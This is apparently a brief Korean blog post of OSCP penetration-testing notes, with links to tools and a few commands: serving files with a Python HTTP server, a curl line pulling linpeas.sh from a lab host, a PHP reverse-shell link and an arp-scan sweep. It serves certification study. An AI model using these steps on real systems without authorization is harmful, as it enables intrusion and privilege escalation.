[OSCP] CheatSheet (25-12-06)

모의해킹 ㅣ 2025. 8. 29. 11:07

Cheat Sheet

https://www.notion.so/wgenie/CheatSheet-2664e6bba79e804ea4a5dc5a56fb62e4?source=copy_link

CheatSheet | Notion

Nmap(AD는 1번만 해도 되는 ping 막아서 -Pn까지만 추가)

www.notion.so

북마크 주소

https://gtfobins.github.io/
https://crackstation.net/
https://gchq.github.io/CyberChef/

OSCP 파일

python3 -m http.server 80
curl 10.10./linpeas.sh -o a.sh

Linpeas 파일
https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS

PHP 리버스 쉘
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

sudo arp-scan -l
로컬 네트워크에 있는 모든 장비를 ARP 요청을 통해 찾는 명령어